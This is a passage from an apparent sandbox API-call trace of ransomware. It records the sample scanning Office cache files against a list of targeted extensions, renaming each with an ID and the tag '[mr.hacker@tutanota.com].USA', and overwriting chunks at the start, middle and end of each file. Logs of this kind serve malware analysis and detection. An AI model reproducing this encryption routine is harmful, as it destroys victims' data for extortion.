[0040.134] lstrlenW (lpString=".dbf") returned 4 [0040.134] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0040.134] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0040.134] lstrlenW (lpString=".1cd") returned 4 [0040.134] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0040.134] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0040.134] lstrlenW (lpString=".jpg") returned 4 [0040.134] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0040.134] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0040.134] lstrlenW (lpString="WordMUI.msi") returned 11 [0040.134] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.135] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=2522624) returned 1 [0040.135] CloseHandle (hObject=0x1c4) returned 1 [0040.135] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi")) returned 0x2020 [0040.135] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.135] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0040.135] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.135] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0x0) returned 1 [0040.135] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.136] ReadFile (in: hFile=0x1c4, lpBuffer=0x3cd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3cd0058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.141] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xcd4aa, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.141] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d10058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.150] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0040.150] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x227e00, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.150] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d50058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.166] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.166] WriteFile (in: hFile=0x1c4, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x350fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0040.332] SetEndOfFile (hFile=0x1c4) returned 1 [0040.332] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3f10058 [0040.332] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.332] WriteFile (in: hFile=0x1c4, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.333] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xcd4aa, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.333] WriteFile (in: hFile=0x1c4, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.339] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x227e00, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.339] WriteFile (in: hFile=0x1c4, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.342] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3f10058 | out: hHeap=0x5d0000) returned 1 [0040.342] CloseHandle (hObject=0x1c4) returned 1 [0041.027] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0041.027] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.027] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.027] lstrlenW (lpString=".doc") returned 4 [0041.027] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.028] lstrlenW (lpString=".docx") returned 5 [0041.028] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0041.028] lstrlenW (lpString=".pdf") returned 4 [0041.028] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.028] lstrlenW (lpString=".xls") returned 4 [0041.028] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.028] lstrlenW (lpString=".xlsx") returned 5 [0041.028] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0041.028] lstrlenW (lpString=".ppt") returned 4 [0041.028] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.028] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.028] lstrlenW (lpString=".zip") returned 4 [0041.028] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.028] lstrlenW (lpString=".rar") returned 4 [0041.028] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.028] lstrlenW (lpString=".bz2") returned 4 [0041.028] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.028] lstrlenW (lpString=".7z") returned 3 [0041.028] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.028] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.028] lstrlenW (lpString=".dbf") returned 4 [0041.028] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.028] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.028] lstrlenW (lpString=".1cd") returned 4 [0041.028] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.028] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.028] lstrlenW (lpString=".jpg") returned 4 [0041.028] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.028] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.028] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.028] lstrlenW (lpString=".doc") returned 4 [0041.028] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.028] lstrlenW (lpString=".docx") returned 5 [0041.028] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0041.028] lstrlenW (lpString=".pdf") returned 4 [0041.028] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.029] lstrlenW (lpString=".xls") returned 4 [0041.029] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.029] lstrlenW (lpString=".xlsx") returned 5 [0041.029] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0041.029] lstrlenW (lpString=".ppt") returned 4 [0041.029] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.029] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.029] lstrlenW (lpString=".zip") returned 4 [0041.029] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.029] lstrlenW (lpString=".rar") returned 4 [0041.029] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.029] lstrlenW (lpString=".bz2") returned 4 [0041.029] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.029] lstrlenW (lpString=".7z") returned 3 [0041.029] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.029] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.029] lstrlenW (lpString=".dbf") returned 4 [0041.029] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.029] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.029] lstrlenW (lpString=".1cd") returned 4 [0041.029] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.029] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0041.029] lstrlenW (lpString=".jpg") returned 4 [0041.029] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.029] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0041.029] lstrlenW (lpString="Proof.cab") returned 9 [0041.029] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0041.296] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=13642474) returned 1 [0041.296] CloseHandle (hObject=0x1f4) returned 1 [0041.296] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab")) returned 0x2020 [0041.296] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.296] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0041.605] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0041.605] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0x0) returned 1 [0041.605] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.605] ReadFile (in: hFile=0x1f4, lpBuffer=0x3cd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3cd0058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.610] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x4563a3, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.610] ReadFile (in: hFile=0x1f4, lpBuffer=0x3d10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d10058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.616] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0041.616] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xcc2aea, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.616] ReadFile (in: hFile=0x1f4, lpBuffer=0x3d50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d50058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.632] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.633] WriteFile (in: hFile=0x1f4, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x350fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0041.647] SetEndOfFile (hFile=0x1f4) returned 1 [0041.647] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3f10058 [0041.647] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.647] WriteFile (in: hFile=0x1f4, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.648] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x4563a3, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.648] WriteFile (in: hFile=0x1f4, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.649] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xcc2aea, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.649] WriteFile (in: hFile=0x1f4, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.650] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3f10058 | out: hHeap=0x5d0000) returned 1 [0041.650] CloseHandle (hObject=0x1f4) returned 1 [0045.203] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0045.203] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.203] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.203] lstrlenW (lpString=".doc") returned 4 [0045.203] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.203] lstrlenW (lpString=".docx") returned 5 [0045.203] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0045.203] lstrlenW (lpString=".pdf") returned 4 [0045.203] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.203] lstrlenW (lpString=".xls") returned 4 [0045.203] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.203] lstrlenW (lpString=".xlsx") returned 5 [0045.203] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0045.203] lstrlenW (lpString=".ppt") returned 4 [0045.203] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.203] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.203] lstrlenW (lpString=".zip") returned 4 [0045.204] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.204] lstrlenW (lpString=".rar") returned 4 [0045.204] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.204] lstrlenW (lpString=".bz2") returned 4 [0045.204] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.204] lstrlenW (lpString=".7z") returned 3 [0045.204] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.204] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.204] lstrlenW (lpString=".dbf") returned 4 [0045.204] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.204] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.204] lstrlenW (lpString=".1cd") returned 4 [0045.204] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.204] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.204] lstrlenW (lpString=".jpg") returned 4 [0045.204] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.204] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.204] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.204] lstrlenW (lpString=".doc") returned 4 [0045.204] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.204] lstrlenW (lpString=".docx") returned 5 [0045.204] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0045.204] lstrlenW (lpString=".pdf") returned 4 [0045.204] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.204] lstrlenW (lpString=".xls") returned 4 [0045.204] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.204] lstrlenW (lpString=".xlsx") returned 5 [0045.204] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0045.204] lstrlenW (lpString=".ppt") returned 4 [0045.204] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.204] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.204] lstrlenW (lpString=".zip") returned 4 [0045.204] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.204] lstrlenW (lpString=".rar") returned 4 [0045.204] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.204] lstrlenW (lpString=".bz2") returned 4 [0045.204] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.205] lstrlenW (lpString=".7z") returned 3 [0045.205] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.205] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.205] lstrlenW (lpString=".dbf") returned 4 [0045.205] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.205] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.205] lstrlenW (lpString=".1cd") returned 4 [0045.205] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.205] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81 [0045.205] lstrlenW (lpString=".jpg") returned 4 [0045.205] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.205] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0045.205] lstrlenW (lpString="InfoPathMUI.msi") returned 15 [0045.205] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0045.205] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=3124224) returned 1 [0045.205] CloseHandle (hObject=0x160) returned 1 [0045.205] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi")) returned 0x2020 [0045.205] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.206] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0045.206] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0045.206] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0x0) returned 1 [0045.206] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.206] ReadFile (in: hFile=0x160, lpBuffer=0x3cd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3cd0058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.212] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfe400, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.212] ReadFile (in: hFile=0x160, lpBuffer=0x3d10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d10058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.220] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.220] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x2bac00, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.220] ReadFile (in: hFile=0x160, lpBuffer=0x3d50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d50058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.235] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.235] WriteFile 